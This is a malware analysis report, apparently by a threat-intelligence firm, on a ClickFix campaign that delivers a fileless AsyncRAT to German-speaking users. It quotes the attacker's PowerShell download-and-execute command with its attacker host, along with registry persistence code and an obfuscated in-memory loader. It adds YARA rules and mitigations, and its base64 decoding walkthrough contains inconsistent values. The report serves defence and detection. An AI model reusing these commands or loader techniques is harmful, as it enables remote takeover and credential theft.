Executive Summary

A fileless AsyncRAT joins the Clickfix party, with an obfuscated PowerShell-based campaign. The malware is delivered via a fake verification prompt that lures users into executing a malicious command. Based on the linguistic preferences in the verification prompt, we can ascertain with high confidence that the campaign is targeted towards German speaking users. The chain abuses legitimate system utilities and in-memory C# loaders with reversed strings to evade detection. Once executed, the malware establishes persistence through registry keys and connects to a remote TCP C2 server on port 4444. It enables full remote control, credential theft, and data exfiltration — all without dropping files to disk. Mitigations include blocking suspicious PowerShell execution, monitoring registry activity, and scanning memory for in-memory payloads commonly used in LOLBins-based delivery methods.

Analysis 

During the routine attacker infrastructure discovery and attribution cycle, we discovered a Clickfix themed delivery website.

‍

‍

When the victim clicks on “I’m not a robot”, a command is copied to the clipboard, and instructions are displayed for the victim to follow.

‍

Copied command:

conhost.exe --headless powershell -w hidden -nop -c $x =

[System.Text.Encoding]::UTF8.GetString((Invoke-webrequest -URI

'http://namoet[.]de:80/x').Content); cmd /c $x" Drücke enter um deine identität zu bestätigen!

‍

The string “Drücke enter um deine identität zu bestätigen!” within the command, translates to "Press enter to confirm your identity!". This suggests that the clickfix delivery page is designed to target German speaking users.

‍

Cyber Kill Chain

‍

Step-by-Step Breakdown 

1. The copied command uses a system utility, conhost, to invoke powershell with 3 flags.

powershell -w hidden -nop -c

1. -w hidden: Hides the PowerShell window.
2. -nop: No Profile (doesn’t load PowerShell profile scripts).
3. -c: Executes the command following it.

2. Downloads powershell payload from a remote server.

$x = [System.Text.Encoding]::UTF8.GetString((Invoke-webrequest -URI 'http://namoet[.]de:80/x').Content)

‍

The command assumes that the content is UTF-8 encoded text, and decodes it as a string.

‍

*The contents of the downloaded payload “x” can be found in the Appendix.

3. Finally, the decoded string is executed using the Windows Command Prompt.

cmd /c $x

Analysis - Downloaded payload “x”

‍

1. Sets up persistence

$c = 'conhost.exe --headless powershell -nop -w hidden -c '+[char]34+$MyInvocation.MyCommand+[char]34;

Set-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce' 'windows' ...

Set-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows' 'win' $c;

‍

• Goal: Ensure the PowerShell script re-executes on next login or boot using RunOnce and Windows registry keys.
• Persistence paths:
  
  • RunOnce executes the script once upon the next logon.
  • Windows\win key contains the full command to be re-used by a new process.

2. Obfuscates payload in ask==gClRm...

$f = 'ask=' + '=gClRmL' + '0V2b' + 'tFm' + 'blk='; 

$d = $f.Substring(3,16).ToCharArray(); 

[array]::reverse($d);

$y = [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String($d -join ''));

‍

• $f is a fragmented base64 string, reversed before decoding.
• Once decoded, it produces a .NET method name or function argument, used below.

‍

3. Loads embedded obfuscated C# code

$g = '<obfuscated and reversed C# code>';

$l = $g.ToCharArray();

[array]::reverse($l);

Add-Type -TypeDefinition $($l -join '');

‍

• $g is a reversed C# class, a malicious .NET reverse shell or stager.
• It includes:
  
  • TCP sockets.
  • Process spawning.
  • Standard I/O redirection.
  • Encoding functions.
• Add-Type compiles and loads this class in memory.

*The contents of “$l” can be found in the Appendix.

4. Executes the embedded code

[B]::ma($y.Trim())

• The class B (defined in the C# blob) has a static method ma().
• $y (decoded earlier) is passed as an argument.

Derivation of $y

$f='ask='+'=gClRmL'+'0V2b'+'tFm'+'blk='; 

$d=$f.Substring(3,16).ToCharArray(); 

[array]::reverse($d); 

$y=[System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String($d -join ''));

‍

Breaking this down:

Step 1: Construct $f

$f = 'ask=' + '=gClRmL' + '0V2b' + 'tFm' + 'blk='

= 'ask==gClRmL0V2btFmblk='

‍

Step 2: Take substring from offset 3 of length 16

$f.Substring(3,16)

= '=gClRmL0V2btFmbl'

‍

Step 3: Convert to array and reverse

# Before reverse: '=gClRmL0V2btFmbl'

# After reverse:  'lbmFtbt2V0LmRlLg='

‍

Step 4: Base64 decode

Base64 string: 'lbmFtbt2V0LmRlLg='

Decoded:       'namoet[.]de:4444'

‍

5. What does the payload do?

‍

1. Establishes a TcpClient to namoet.de:4444.
2. Configures:

• ProcessStartInfo with:
  
  • RedirectStandardInput = true
  • RedirectStandardOutput = true
  • RedirectStandardError = true
  • UseShellExecute = false
  • CreateNoWindow = true

3. Launches a shell.
4. Relays output and error back to C2.
5. Listens for input commands from C2 and executes them on the victim system.

On certain exit codes, it kills itself with GetCurrentProcess().Kill().

‍

Attribution - AsyncRAT

1. Use of PowerShell and conhost.exe for Stealth Execution

• TTP: T1059.001 – PowerShell
• AsyncRAT often uses obfuscated PowerShell launched from conhost.exe or powershell.exe with flags like -w hidden, -nop, and -c to minimize visibility.

In our sample:

conhost.exe --headless powershell -w hidden -nop -c ...

This execution pattern is frequently observed in AsyncRAT delivery.

2. In-memory C# Compilation via Add-Type

• TTP: T1127.001 – Compile After Delivery
• AsyncRAT is known for loading its core functionality through obfuscated and reversed C# code, which is then compiled in memory using PowerShell's Add-Type.

The payload contains:

Add-Type -TypeDefinition $($l -join '')

[B]::ma($y.Trim())

3. Reverse-Engineered .NET Loader Format

• TTP: T1218.005 – Signed Binary Proxy Execution: rundll32
• The payload includes typical byte[] handling, process injection, and embedded base64 C# in a reversed format.
• This loader logic matches how AsyncRAT stages and loads encrypted payloads at runtime.

4. TCP C2 on Port 4444 with Async-style Process Management

• TTPs:
  
  • T1071.001 – Application Layer Protocol: Web Protocols
  • T1571 – Non-Standard Port Usage
• The C2 host is namoet[.]de:4444, which aligns with AsyncRAT's default behavior: a persistent TCP connection (often port 4444 or similar).

The .NET code contains:

TcpClient b = new TcpClient(); b.Connect(d, e);

...

while (true) { c.Read(...) ...}

that’s indicative of a long-running backchannel—very characteristic of AsyncRAT's C2 logic.

5. Registry Persistence with HKCU\...\RunOnce

• TTP: T1547.001 – Registry Run Keys/Startup Folder

The malware sets persistence using:
Set-ItemProperty 'HKCU:\...RunOnce' ...

AsyncRAT variants often use HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce or Run for user-level persistence without triggering UAC.

‍

MITRE Mapping

‍

IOCs 

‍

As we know, the clickfix delivery page copied a command that was appended by the text “Drücke enter um deine identität zu bestätigen!”. Upon using the text in the copied command as a pivot point, we discovered additional attacker controlled infrastructure that were used in the same campaign for clickfix delivery and C2 operations.

‍

Based on the additional infrastructure discovered, we can ascertain with medium confidence that this campaign has been running since at least April 2025.

Yara Rule (Memory Focused)

rule AsyncRAT_Memory_Resident_Reversed_Loader

{

    meta:

        author = "CloudSEK Cyber Threat Intelligence"

        description = "Detects AsyncRAT C# loader code in memory, focusing on reversed strings and reflective loading behavior"

        malware_family = "AsyncRAT"

        date = "2025-06-12"

        scope = "memory"

‍

    strings:

        // Reversed .NET namespaces indicating obfuscation

        $s1 = "gnidaerhT.metsyS gnisu" ascii

        $s2 = "txeT.metsyS gnisu" ascii

        $s3 = "stekcoS.teN.metsyS gnisu" ascii

        $s4 = "scitsongaiD.metsyS gnisu" ascii

‍

        // Add-Type used at runtime

        $s5 = "Add-Type -TypeDefinition" ascii

‍

        // TcpClient logic reversed (in-memory string form)

        $s6 = "tneilCpcT wen = b tneilCpcT cilbup" ascii

        $s7 = ")(f;)(maertSteG.b = c;)e ,d(tcennoC.b" ascii

‍

        // Function signatures reversed

        $s8 = "diov citats cilbup" ascii

        $s9 = "ssalc cilbup" ascii

‍

        // Registry persistence reversed (optional)

        $s10 = "'nosiW' = yek'1UR\\...'KUH" wide ascii nocase

‍

    condition:

        5 of ($s*)

}

‍

Yara Rule (Generic)

‍

rule AsyncRAT_PowerShell_ReversedLoader

{

    meta:

        author = "CloudSEK Cyber Threat Intelligence"

        description = "Detects AsyncRAT payloads using PowerShell with reversed base64-encoded C# and Add-Type loader"

        malware_family = "AsyncRAT"

        date = "2025-06-12"

‍

    strings:

        // PowerShell pattern using common obfuscation flags

        $ps_flags = "powershell -nop -w hidden -c" ascii

‍

        // Use of Add-Type to compile C# code at runtime

        $add_type = "Add-Type -TypeDefinition" ascii

‍

        // Registry persistence keys

        $reg1 = "HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce" ascii

        $reg2 = "HKCU:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows" ascii

‍

        // Reversed C# namespace common to AsyncRAT

        $rev_using = "gnidaerhT.metsyS gnisu" ascii

        $rev_dns = ")]0[w(gnirtSteG.tluafeD.gnidocnE = emaNeliF" ascii

‍

        // TcpClient and Connect() reversed calls in .NET

        $tcp_client = "tneilCpcT wen = b tneilCpcT cilbup" ascii

        $connect_call = ")(f;)(maertSteG.b = c;)e ,d(tcennoC.b" ascii

‍

        // Common TCP port used (4444) for C2

        $port_4444 = "4444" ascii

‍

    condition:

        all of ($ps_flags, $add_type, $reg1, $rev_using, $tcp_client) and

        any of ($reg2, $rev_dns, $port_4444, $connect_call)

}

‍

Impact

• Full Remote Control: AsyncRAT provides attackers with complete remote access to the compromised system, enabling keylogging, file exfiltration, and remote command execution.
• Credential Theft: The malware can extract credentials from browsers, memory, or saved session data, leading to further lateral movement or account compromise.
• Persistence via Registry Abuse: By writing to HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce, the malware ensures it runs at user logon, surviving reboots.
• Evasion via In-Memory Execution: Payloads never touch disk — all execution occurs in memory (reflective PowerShell + reversed C#), bypassing traditional file-based AV detection.
• Command-and-Control Communication: Uses obfuscated TCP connections (often over ports like 4444) to exfiltrate data or receive commands — enabling long-term covert operations.

‍

Mitigations

• Block LOLBins like conhost.exe for PowerShell: Use EDR or AppLocker to prevent suspicious use of conhost.exe --headless launching powershell.exe.
• Network Segmentation and Egress Filtering: Block known or suspicious outbound TCP connections (e.g., port 4444 or to unknown IPs/domains), and apply domain-based blocking for known C2 infrastructure.
• Registry Monitoring: Set up detection for changes to high-risk keys such as RunOnce & Windows\win
• Memory Scanning with YARA or EDR: Implement in-memory scanning using YARA rules (like the one provided) to detect obfuscated C# code, Add-Type loaders, and TCP logic.
• PowerShell Constrained Language Mode + Logging: Enforce PowerShell Constrained Language Mode via GPO and enable ScriptBlock Logging and Transcription to detect obfuscated or reflective code.

‍

Appendix

‍

1. $l – Deobfuscated C# Loader for AsyncRAT

‍

References

• *Intelligence source and information reliability - Wikipedia
• ^#Traffic Light Protocol - Wikipedia